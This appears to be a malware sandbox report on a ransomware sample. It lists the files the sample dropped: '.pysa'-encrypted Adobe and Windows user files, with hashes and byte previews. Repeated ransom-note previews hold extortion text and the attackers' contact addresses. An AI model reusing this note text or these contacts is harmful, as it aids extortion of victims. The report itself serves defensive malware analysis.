                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\3D Objects\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.046391414378092
                  Encrypted:false
                  SSDEEP:48:spYvFMqweUU/Vpz+XXloqTocZah7Ag8LdN4WnVMs/Sg9G2EtbVG+7eo/HUOO2Crw:4YvFN2HlZapAXjD/S3BjjWv+eLM/
                  MD5:76549404AECFBAA7F0609E8117784322
                  SHA1:6FAD8F06F1A317C7D59938BFF4B133A7BD07B5DB
                  SHA-256:EFC89BD27FB0D5B4304B44492E0FFDD78DEA3B385E1C8FFF40B65422CC1B7779
                  SHA-512:2CFEBA80B464112AAA4EE492FC042EFCDA8FE82D8B40B15282474FB183518A61D587A2AEA2F53CB64473CB0C54E61AAB5D3CCF6AA22D788C6176B1D203878599
                  Malicious:false
                  Preview: -a.0.nT.0.n...t......^...(:x....\.I.S=........O.....rG..J...A3.'..n5UH.v.....d.E6ET.1m{.0.SP....X..X.G9.@...{.M.^...+.F...f...../..6.C.Wf..^.z.........^.......Z...jr....[z.h........u..].>.+..l....:FJ._....V..x..%.K.E0^..J.|..Z......#....3Y.rF..+M#.@.Xh.......^;.6.0C..aq...Yw...:..wF..i:..e....+...'..X'4...=*ev.sp.:..X..(.....?..wk..5.5......"..3..2.)..%R.,.)...~..C...e}.x.Y.H..-.....-.h....`..0..........b.|.f$....`t..s'...E..<.K ].....sd...t4/g...K6b.]...:Q...J.=[yS..........F..P..jA.HZ.Ib4O.J}&x....A.......O...t..,.[9w.ezv........G.I=.\..n..)....t!|.P:.....@....w...#...>.Y.4].*]@...Ev..R3~.!....-.NA..%`zc..f..,.(.4..-...aH..u9h...E....._.!.~...K.DxE.....&)63..G#f.[.ie._..Eu...].}..i.!<....n.y..Q...Di~...7...?K.Kq.Cs!U..g'e..........]ZvP.C....t.2.RBd.i.}...urA&..g.........z.>.z7.].Q...*..{*0..r....1..h.X.R..:..y#w.w.g~U1..g..k..#...g...v.^.w...o.9....VS..B.!.&qt.mZ...!....F3.D#L....[.......S/.l..,...]r..w.)...V`%-s..\...3...P..
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994232390939432
                  Encrypted:true
                  SSDEEP:3072:WmWDIR5dJY9l3hlEsQClxv1XGWARDeYeL:W9DIPdJYX3hlEJCzvdEiL
                  MD5:C658E484EC9402E0806A32FAB5140E68
                  SHA1:0E4AACBD517079EA8DF13E452C06612CD92CB941
                  SHA-256:2581896E953F016E6926449B48EB698A1731643196F81DA3B59F875EB19F3D83
                  SHA-512:00B14EE77F441FFE2EA69E7B799A051976B6169C4CAF56562449C0DEBC4801D5A30D081FCD1049E8F8CD15463CB608B637F1EBC5268C4C87C6309CE6F0C01F54
                  Malicious:true
                  Preview: .s.vd..G.3..~o.dj.F.d.AAF.}....m..j.....5NO....3...t+.wg0+...s\:.).....u.4z+v.V5M3hOi....MR.;^oR.. *.t*._....*.`.M.C`L..44....h.......$..."\.av.rC..e.$....)V...ba.z...|&..1.(...!.1HB.?^. .!...p.!t.Fx.MH1..<...5 ..+.'.......e..1...v....*.....4q...l./..pH>.......E.y...=...B.Z.p...W....-~.M=]W".`..ocE.D:^.....M........PIT.d.;D%%..f.......>...v.....7.in7\EDQ..V..$...Ab.......x...f.`.aN.OA...*2..J..v..J3.w...%....QZZ.xy ....2....q....k.(..&4.N..L.Q.......5..1{.Dct..G..)....B.......N.....M.:k.......5.G..[.....E.,..o...................b..P..:.L%}T.GB.p.e.........@.w....ag.%I.#...S..t.....%[......."....0....d.B-..4...........=.=J.8...E/......b.J'..N.@.y..~D........ar.6.!.+..6@~..W.N..V..Y....P.Y..b+......MK.={5...?.K. ..[..1...r^......ov...8CC.6.R.A0.t9....I..M.....Mw...5......]....E<...NC.\c.Y..# 1..jy;...n.U....V;..t..z....J...P.....m....5..J.........+D...yA(m...............?..I.QJmm6.0.*..;Z..rSi.....x...nj.=..P.1..d6.o.!{....M.a....-|....Z
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):11264
                  Entropy (8bit):7.757195668468089
                  Encrypted:false
                  SSDEEP:192:2uhExKHZGp7kWD4IJB7bsSGGcrFaJj9Ez4UA:TkpIG4g7bsSGGcSj6z1A
                  MD5:F2B1A8D3C5FDB3C03D992AF9C9CA6927
                  SHA1:6A067E6353DE2D00CA174C57C9CA7FC151F4EF43
                  SHA-256:1D614B51AACFEE3C7A26C6A5B65AF650748C3E8D5B8A00AE5C9BFB39E8241823
                  SHA-512:C05686A8CF673E128DC3E9B710997A6E8A6AFD34595CE15F91B638CA24C503EF741DEA4204118141A29A1462BDCDC7473CD2FB3182DDCEA292D234ECCF4DDB9A
                  Malicious:false
                  Preview: ..N.......\H...F..S..^.M.=..B'..PB...W...G..n.G'..........z.!@.G..........o.x.<K...OB.o.<.g...-t...1\...dS.\z>...cR.m.F.^a.....`..).8...7....*AF...>6....#..S..-.N+.d...0.ONJ.Y..X..+.O.5.!.V.@0....~.z.....B.G8_..9...@.l"B.C..A..^.W....B.o...Sq~......f..f.n.$.r.,..6..u.g.....H.j`......B-..?l.Z?..~.XSHQ.n......'.._0.%.....'....a.oN.p.`......N.......D..J..Vf.$.8..W#%I<.\c}z.}.........W"-W.O?...s.....iB.e....TF.E...JA.3.O"...[.0.B..1e.ls. e.1...)..^y..i.-..........&..,^..A"...g...=%..D...O.5.X...y.$.3t.yx....E.....{y.......3R@.%.m.mp...v...g~..`..<.{#N..."X....'[&Y..H..o..^.1..;..3L..\...C.../!m34.F'...>.E$"..3.k.&.J....y...L.N....:#(e..?2...b.bD.q/."..E#.#....j...z.C...,..NH..%.`N......-o.&^?..f.n.-X....AV....u.,.p.i.J+.d......$.a....*...8...........h../9hD......g....$/...&.......8...=.K...q.1m.t.b...n...a)F........H......p..-.f..\a.p&V..t......,...64]....,..>..0OC.&&.%.|V..}..s...)...c..n.W.n......|..2..~..QPd5...4s..|..4z..G_.9Fz..C..n
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998224545724542
                  Encrypted:true
                  SSDEEP:3072:/HvpxpGIaBZZK6VIJYDGGQb6sdZbOajeadC+H6Vjc8Lh1vRNAD7u1bbDi3H6TL02:HpmcgY3GQGsdZeqC+aVjbLrLSKsH6TLF
                  MD5:FCC299607FDB76245C9DB74B49F270BB
                  SHA1:924CECC33D81208015AB452F5AAA773A73C7EB5E
                  SHA-256:9CBDEAB8112E5289371D198D54680E3C9A158364AA067CCA614CBE5D4BB79103
                  SHA-512:A6C1950558525994BC73A6C6855694401C11E8568F3A75AC3C68567C2C99DE458EF1591F5DFDE0FA6E4835A7FFF366DCF240C19D331BCBF97624FF988C588E51
                  Malicious:true
                  Preview: ...Gd.I..}..zu.P..H..1_.....A.8....hM..m.........l.y.......l..7.T./.Sv.2..F)0.].........}>..E.....U.w.;.#......V.?.{..$....._..r..Y;....>.V.^,.)..>.o..W..:.$n%.w.*n.6..VG~..K....8...4..."..]......./..'..j..c.xmkXG...G.....F.......B...q=..C....Q.E.....U..(....'.{......_.G..=.s;.3...8D{......e..$.....".......b...mg.je....N....jK.0^..g7^#.1g.&.002...|..R.\.-V.!Uk/.t.25....Y..N>...4C.\%N.AFR8`......../W.....J.t......#.5.. ........I(.....Z).ZG.PYtK3Rm.... ............._.TR....4....P.a.$.E....(..#..v........s...T......_.&..f.V)..A,.<i.....{...:.l..X.&....K.}jn.a<......$m.0..7|.b{qy.'.......(.>.z'..QE...\..#.....6.=...........B....J......Ez...K. :.p.........#..&.a..^c.....E....w5.9.....cc`kU.|{....'.[hQ(&.sr.;'fb+Y.q...r.\..h.........'..]4..2l-d}xU....nM..e...%..s.3"....0.x.......}..gv.o.8I........*F.7.u.2...w....ld..~.......u.......gpZi..O.>J&...B.+&..f.N..oY....\..9$).^D...O.+.|.,...B..$...1_.K..Ua._...2r.s..!.....q.....elt...7..b..d......k.W8..b~.
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):13312
                  Entropy (8bit):7.819195699914702
                  Encrypted:false
                  SSDEEP:384:Jc+qV1PnTt9b8REJAQ74WP9KCMOQnbGuWJXoX7W8y:JC1fTXb8REJhzPwnnK/4Xy8y
                  MD5:23017715FC7D00F8126C20514959CE8E
                  SHA1:4BD41F2282C1AAEC3B0B1C94AE202904DC2B23D8
                  SHA-256:3E3812E60A2CF136FAA4F9F311D4DAD35BDFC9AE0915D8E8466F776870ACEB38
                  SHA-512:F97928DB9B4C9F4A30DB2DF6EDFDC9638520F8BA7F8BB57CB5C8BE0E8465C7FBD3C6D26493CBD75B82822AD876E18404C95C8048B020A3F1AEAA5057EC9F0603
                  Malicious:false
                  Preview: .P0.*..... .K...#.:.....%i...._rF...P1...J5lr.e.!..-...1.B..5.B3B..A.'.J.z..A=...5.g.h..l...$c..........XA.l.rN........R...`..x..s....0.....M]...2.Dn...@...X.w.TnC5.*........2.X.zf..g.......kC.a........(.(.'.@.;..!.F...3..q0...9.3..N.k#,.#^...;u....'..#...7.37...@m.....qjL.r....'`\.k9....D..x...1..X.....~.n.~..%.i.....Ut.y..... ..i.L....'.=@..`..{l.X.....S?..!.0~...-.!M..h.*...9Z.......h..4...Z..^.=.....Z...@.....*.....M.z..0..hA%....I...g.0....gO.$.Bi.r....(.I.g.%U.;.c!y......~.K`.J.vw...n........{..O....y...5.H....2*...q..l..6#...m.iQ.....A...n.O&=...JD..2?(...Y~>X|O.h.!.Z.F9K\...j.g.qa.C.4.d...F..... {8........a.!..6...+mq.........+Y..h...l.....w.3!H..K..j.....s..W3.r.......}.a...+U...0.;`wq.|N.B^.0.<.h>..$.../.9h...z5....{.g...4..I.0C.P.<p.$F....,0...8=.....,oj.........Ki.#R.U......-B....c.3..gl....6Q1.9.(.....cX.}.e....ik...._.WX.s..........>w.....EMM/.(\..i9.^....t_...D..]....<w.~E|...M%.......6...+..G...<......(.#.;.x.J..nC.e.
                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):7.988252798879084
                  Encrypted:false
                  SSDEEP:1536:4Dcr2Dca89MpDaXgHzv1jMaIhoRsNQVu9fPpAWSuxRab9i621Qx:uVca89ouitMTouNQVodSuGbw6SQx
                  MD5:1343A8EA7DF3245E84A9561BCEC5B2D6
                  SHA1:E1017449FFB123E83F282DA446339253A60758B6
                  SHA-256:7A831C5C89B060A9075093344DD849F4C2C0F89FA077E28AF37863C12BD33B73
                  SHA-512:CD72AB766F2B4B21C8DF27A5B16152E3D8881C59039A1B6ACC8C2286747628AB793E10FADA2BA3D1D586D6829E7C4F1F725876AB3F92041878ABE4E96D9487EC
                  Malicious:false
                  Preview: *^4.....x.'..h.g.4..x..MR.Bb{....#..d..K#T.5?.R..ylpg...................L.4......N..b.Z.+.^3.:....Nj..........?..F.).#fM..S. K.f.}OP.......9WzB._K)Y...L..........7`.+y_..k .Y.8...@....A.z...b97e#9...@0.k...Zkb}&..!.%-.r...;...-.......Mm...;.iFh........."..m..S.......i..`....a.e\..V...O...p..2.@P......m.]r...c.].@[..,..|....6)#<p!`.-..A.WW..M.$D.....g.;..!.<p7.d.5.`.N.v.z..~...wmD.Zb...P..o<..:....x...'..+r.....s.Rd..;..............%)..m.a"Z...|%.G.6.W.y...O.....}.......83...>..o$:8F...>...#..E%.kO.2...%.......h=.Xb.->...N.*N...82@u.}....8._..A...l.7N:s...q.=..uj}6z..R.!C.........M.y.........H..c.......W.;...+...mo.....$...fp0A...99...xK..r'...hR.....7.tcH{f..s..P8.X...!.HKRm.i....d....Y....R5....+O.pr..o...ph.....V..?..$U=6...af.d........e.1I...:7.!5...a..<.k.........'#s9...).F..g.}..7u..8-3..aB.w.[.........T....6..;.........Q.r.....[..[+..L4.).Z-h...:f..^...(U.s...O.E..^..|.w].....+.6>:II...>4...".'..k.d_.X.P.\....k.v.
                  C:\Users\user\AppData\Local\Adobe\Acrobat\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Adobe\Color\Profiles\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Adobe\Color\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Adobe\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Comms\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.676119332408718
                  Encrypted:false
                  SSDEEP:192:N+hADvUs2dRGT0daoGzdf3rpnw3qJcCdwFrs5pjFTNvakenC:oavUbNd1kfby3tIJFTIrnC
                  MD5:90D4F3AFE87B0BD796631EF0B943B78D
                  SHA1:69734B097B0CCAF2CF1F5006A27F3FAD361BBB88
                  SHA-256:DBE9DBE14CBAFF202441E3C5004AAB4766AAD131C7AF3FF2838E2E0C99BF41F8
                  SHA-512:ADF4B072338CF5C22F4CFEC7E8CACFDCAD705108B49AF0415DD42F1331AF4CFAD25F7338785DAA2582364089DF29D6DE0F092AED68454624B4D0030672C6A585
                  Malicious:false
